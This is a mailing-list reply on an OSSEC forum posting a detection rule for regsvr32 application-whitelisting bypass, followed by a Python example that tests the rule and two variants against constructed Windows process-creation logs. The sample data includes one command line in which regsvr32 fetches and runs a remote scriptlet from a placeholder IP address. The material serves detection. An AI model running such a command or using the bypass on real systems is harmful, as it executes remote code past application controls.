Interesting.. thanks for that blog post. COM+, lol, classic!

Anyhow, here is a crude one, but it works.. ;-)

<!-- Drop into local_rules.xml. 18100 is the OSSEC parent rule for Windows event-log entries;
     <match> is a plain substring test against the whole forwarded log line. -->
<group name="local,windows,">
  <rule id="182675" level="12">
    <if_sid>18100</if_sid>
    <match>Regsvr32.exe</match>
    <description>Suspicious - "Regsvr32" capable of application whitelisting bypass.</description>
  </rule>
</group>



On Tuesday, April 26, 2016 at 11:37:07 AM UTC-4, [email protected] wrote:
>
> Hello group,
>
> Here is an interesting article on how Regsvr32.exe can use .com script files 
> to execute code. I didn't see a remediation, but it's good to at least be 
> aware of it. 
>
>
> http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
>
> My question is: can we write a rule to detect that Regsvr32.exe has been 
> run?
>
> Thanks,
>
>

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to [email protected].
For more options, visit https://groups.google.com/d/optout.
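To see what the posted rule actually catches, here is an added example (not from the thread and not OSSEC code) that replays constructed Windows Security 4688 process-creation lines, in roughly the shape the OSSEC Windows agent forwards them, through three matchers: the posted rule's `<match>` semantics, a case-tolerant variant, and a tighter one keyed on a remote `/i:` argument. The 4688 line layout, the host, user and IP values, and the command line used for the technique (`regsvr32 /s /n /u /i:<url> scrobj.dll`, as I recall the linked post) are all constructed here; that `<match>` is a case-sensitive substring test is my understanding of the classic OSSEC matcher and is worth confirming with `ossec-logtest` on your version.

```python
"""Replay constructed Windows event-log lines through the posted OSSEC rule's
matching semantics and two variants, to see what each one catches.
Added example; not OSSEC code and not from the original thread."""
import re

# Constructed lines approximating what the OSSEC Windows agent forwards for a
# Security 4688 process-creation event (not captured from a real host).
SAMPLE_LOGS = [
    # 1. vendor installer registering a local DLL, image path capitalised
    ("WinEvtLog: Security: AUDIT_SUCCESS(4688): Microsoft-Windows-Security-Auditing: "
     "SYSTEM: NT AUTHORITY: HOST1: A new process has been created. "
     "New Process Name: C:\\Windows\\System32\\Regsvr32.exe "
     "Process Command Line: Regsvr32.exe /s \"C:\\Program Files\\Vendor\\plugin.dll\""),
    # 2. the same registration, lowercase as Windows typically writes the image path
    ("WinEvtLog: Security: AUDIT_SUCCESS(4688): Microsoft-Windows-Security-Auditing: "
     "SYSTEM: NT AUTHORITY: HOST1: A new process has been created. "
     "New Process Name: C:\\Windows\\System32\\regsvr32.exe "
     "Process Command Line: regsvr32.exe /s \"C:\\Program Files\\Vendor\\plugin.dll\""),
    # 3. regsvr32 handed a remote script location via /i: (assumed shape of the
    #    technique in the linked post; URL and host are made up)
    ("WinEvtLog: Security: AUDIT_SUCCESS(4688): Microsoft-Windows-Security-Auditing: "
     "jdoe: CORP: HOST1: A new process has been created. "
     "New Process Name: C:\\Windows\\System32\\regsvr32.exe "
     "Process Command Line: regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
    # 4. unrelated process; no rule should fire
    ("WinEvtLog: Security: AUDIT_SUCCESS(4688): Microsoft-Windows-Security-Auditing: "
     "jdoe: CORP: HOST1: A new process has been created. "
     "New Process Name: C:\\Windows\\System32\\notepad.exe "
     "Process Command Line: notepad.exe"),
]


def ossec_match(needle, log):
    """Semantics of classic OSSEC <match>: a plain, case-sensitive substring
    test over the whole log line (assumption about OSSEC; verify with
    ossec-logtest on the version you run)."""
    return needle in log


def rule_182675(log):
    """The rule posted in the thread: <match>Regsvr32.exe</match> under 18100."""
    return ossec_match("Regsvr32.exe", log)


# Variant A: tolerate the initial letter's case. In OSSEC's own regex syntax the
# equivalent is <regex>[rR]egsvr32.exe</regex> (OSSEC treats a bare dot literally).
CASE_TOLERANT = re.compile(r"[rR]egsvr32\.exe")


def rule_case_tolerant(log):
    return CASE_TOLERANT.search(log) is not None


# Variant B: only regsvr32 invocations whose /i: argument points at a URL.
# Needs the command line in the event, i.e. the "Include command line in
# process creation events" audit policy turned on.
REMOTE_SCRIPT = re.compile(r"regsvr32\.exe.*\s/i:https?://", re.IGNORECASE)


def rule_remote_script(log):
    return REMOTE_SCRIPT.search(log) is not None


def evaluate(logs=SAMPLE_LOGS):
    """Return, for each log line, the names of the matchers that fire on it."""
    rules = {
        "182675 (posted)": rule_182675,
        "case-tolerant": rule_case_tolerant,
        "remote /i:": rule_remote_script,
    }
    return [[name for name, fn in rules.items() if fn(log)] for log in logs]


if __name__ == "__main__":
    for log, fired in zip(SAMPLE_LOGS, evaluate()):
        print(log.split("Process Command Line: ")[1])
        print("   ->", ", ".join(fired) if fired else "no alert")
```

The second line slips past the posted rule purely on case, which is why the `[rR]` class is the usual OSSEC workaround. The third matcher is the one worth promoting to a higher level: regsvr32 registering a local DLL is routine during software installs and will page you constantly at level 12, whereas a `/i:` argument pointing at a URL is not something an installer does.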
